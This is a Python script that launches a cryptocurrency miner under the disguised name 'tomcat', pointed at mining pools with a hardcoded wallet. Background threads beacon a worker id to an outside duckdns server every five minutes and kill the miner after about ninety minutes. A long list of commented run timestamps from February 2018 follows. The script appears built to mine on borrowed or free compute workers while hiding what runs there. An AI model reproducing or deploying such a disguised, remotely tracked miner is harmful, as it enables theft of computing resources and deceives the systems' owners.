import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:06.065051
#2018-02-17 17:21:06.211404
#2018-02-17 19:09:04.254052
#2018-02-17 20:57:01.458995
#2018-02-17 22:43:01.753190
#2018-02-18 00:28:04.120884
#2018-02-18 02:18:07.357803
#2018-02-18 04:05:05.470590
#2018-02-18 05:54:06.206378
#2018-02-18 07:45:07.301804
#2018-02-18 09:32:06.168882
#2018-02-18 11:18:07.197180
#2018-02-18 13:04:01.867293
#2018-02-18 14:53:07.551929
#2018-02-18 16:41:01.911619
#2018-02-18 18:30:07.771789
#2018-02-18 20:18:02.230803
#2018-02-18 22:02:06.925596
#2018-02-18 23:51:05.429871
#2018-02-19 01:37:07.162583
#2018-02-19 03:25:07.974351
#2018-02-19 05:10:07.057047
#2018-02-19 06:55:03.964093
#2018-02-19 08:44:01.484256
#2018-02-19 10:32:07.796486
#2018-02-19 12:20:08.623104
#2018-02-19 14:08:08.171338
#2018-02-19 15:57:07.591987
#2018-02-19 17:46:04.006525
#2018-02-19 19:33:06.252160
#2018-02-19 21:22:05.641816
#2018-02-19 23:08:04.608398
#2018-02-20 00:51:05.970229
#2018-02-20 02:40:07.070561
#2018-02-20 04:29:03.514417
#2018-02-20 06:13:02.166727
#2018-02-20 07:58:01.756044
#2018-02-20 09:43:06.067185
#2018-02-20 11:27:08.067049
#2018-02-20 13:14:08.398811
#2018-02-20 15:00:11.317220
#2018-02-20 16:44:12.374212
#2018-02-20 18:33:01.315651
#2018-02-20 20:25:02.223686
#2018-02-20 22:10:09.110811
#2018-02-20 23:51:01.191296
#2018-02-21 01:36:01.512400
#2018-02-21 03:24:04.585502
#2018-02-21 05:13:07.269160
#2018-02-21 07:02:06.812458
#2018-02-21 08:48:04.312589
#2018-02-21 10:36:07.275441
#2018-02-21 12:24:09.003618
#2018-02-21 14:12:05.296499
#2018-02-21 15:58:04.453658
#2018-02-21 17:50:08.244444
#2018-02-21 19:38:06.755851
#2018-02-21 21:25:01.678412
#2018-02-21 23:11:01.304512
#2018-02-22 01:01:07.919225
#2018-02-22 02:50:07.789057
#2018-02-22 04:37:07.517999
#2018-02-22 06:23:06.880434
#2018-02-22 08:12:01.388495
#2018-02-22 10:01:06.604015
#2018-02-22 11:45:14.279298
#2018-02-22 13:30:03.195479
#2018-02-22 15:18:09.385478
#2018-02-22 17:03:02.195307
#2018-02-22 18:49:08.778653
#2018-02-22 20:40:08.927360
#2018-02-22 22:27:02.248357
#2018-02-23 00:14:04.240692
#2018-02-23 02:02:05.575305
#2018-02-23 03:50:05.801691
#2018-02-23 05:41:06.216526
#2018-02-23 07:25:09.775555
#2018-02-23 09:29:07.911674
#2018-02-23 11:34:08.248786
#2018-02-23 13:23:01.897106
#2018-02-23 15:10:07.427385
#2018-02-23 17:00:06.696242
#2018-02-23 18:50:07.742405
#2018-02-23 20:35:04.130996
#2018-02-23 22:21:05.918073
#2018-02-24 00:07:05.107292
#2018-02-24 01:58:04.767305
#2018-02-24 03:51:04.836845
#2018-02-24 05:36:04.940273
#2018-02-24 07:22:01.728070
#2018-02-24 09:12:01.464460
#2018-02-24 11:11:07.119521
#2018-02-24 13:00:01.414303
#2018-02-24 14:47:06.558006
#2018-02-24 16:39:03.491601
#2018-02-24 18:27:05.727765
#2018-02-24 20:14:06.433605
#2018-02-24 22:03:03.651937
#2018-02-25 01:01:01.476869
#2018-02-25 04:43:07.806255
#2018-02-25 08:49:02.028518